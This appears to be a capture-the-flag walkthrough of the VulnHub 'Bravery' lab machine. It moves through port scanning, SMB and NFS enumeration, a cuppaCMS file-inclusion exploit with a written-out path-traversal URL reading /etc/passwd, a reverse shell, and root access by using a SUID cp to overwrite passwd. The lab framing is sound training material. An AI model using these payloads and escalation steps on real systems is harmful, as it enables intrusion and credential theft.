you can download it here: https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

use nmap to discover the target:

1
nmap -p 1-65535 -T4 -v 192.168.227.0/24

1

check its 80 port

2

default apache 2.4 page, use dirb to scan for any sensitive files and directories

43

4

5

nothing much more.

what I know so far: there is a cms called cuppaCMS, installed in an unknown directory.

check its 8080 port

6

7

8

9

didn’t gather much useful information.

had been stucked here for very long, decided to do a thorough port scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-07 00:11 EDT
Nmap scan report for 192.168.227.154
Host is up (0.00042s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 4d:8f:bc:01:49:75:83:00:65:a9:53:a9:75:c6:57:33 (RSA)
| 256 92:f7:04:e2:09:aa:d0:d7:e6:fd:21:67:1f:bd:64:ce (ECDSA)
|_ 256 fb:08:cd:e8:45:8c:1a:c1:06:1b:24:73:33:a5:e4:77 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/udp nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/udp mountd
| 100021 1,3,4 42062/tcp nlockmgr
| 100021 1,3,4 47637/udp nlockmgr
| 100024 1 47575/tcp status
| 100024 1 52096/udp status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2018-06-10T15:53:25
|_Not valid after: 2019-06-10T15:53:25
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.7.1 (workgroup: WORKGROUP)
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http nginx 1.12.2
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 4 disallowed entries
|_/cgi-bin/ /qwertyuiop.html /private /public
|_http-server-header: nginx/1.12.2
|_http-title: Welcome to Bravery! This is SPARTA!
MAC Address: 00:0C:29:38:6F:F8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: BRAVERY

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s
|_nbstat: NetBIOS name: BRAVERY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.1)
| Computer name: localhost
| NetBIOS computer name: BRAVERY\x00
| Domain name: \x00
| FQDN: localhost
|_ System time: 2019-06-07T00:12:08-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-06-07 00:12:08
|_ start_date: N/A

TRACEROUTE
HOP RTT ADDRESS
1 0.42 ms 192.168.227.154

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.99 seconds

smb share(port 445) is enabled, nfs(2049) is enabled, see if I can mount the drive locally.

10

seems nothing special. the file qwertyuioplkjhgfdsazxcvbnm looks suspicious

check smb share

11

12

13

14

david’s password seems to have been leaked, that ‘s why he is asking others not to spread the password around.

tried to access secret folder, and finally got in using username david and password qwertyuioplkjhgfdsazxcvbnm

15

get three urls: /devops/directortestpagev1.php, /developmentsecretpage and /genevieve

tried to access the three urls and succeeded with /genevieve

and found this: http://192.168.227.154/genevieve/cuppaCMS/index.php

so this is the cuppaCMS I was looking for.

google cuppaCMS for available vulnerability and found this https://www.exploit-db.com/exploits/25971

file inclusion leads to rce

http://192.168.227.154/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

16

17

ok, now I have a webshell.

get a reverse shell, and make it interactive.

18

look for suid file to escalate privilege

1
find / -user root -perm -4000 -print 2>/dev/null

19

check cp

20

seems like it allows me to overwrite anything.

I can add one more line(add one more user) to the passwd and get root.

21

PS: this is probably the hardest one so far.